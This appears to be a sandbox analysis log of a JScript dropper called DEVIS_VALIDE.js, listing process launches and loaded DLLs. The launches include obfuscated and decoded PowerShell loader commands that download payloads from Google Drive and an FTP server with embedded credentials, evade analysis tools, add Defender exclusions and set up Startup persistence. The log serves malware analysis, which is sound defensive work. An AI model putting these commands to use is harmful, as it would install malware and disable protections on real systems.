Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 +	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv \| Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz \| Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg \| Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\DEVIS_VALIDE.js"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
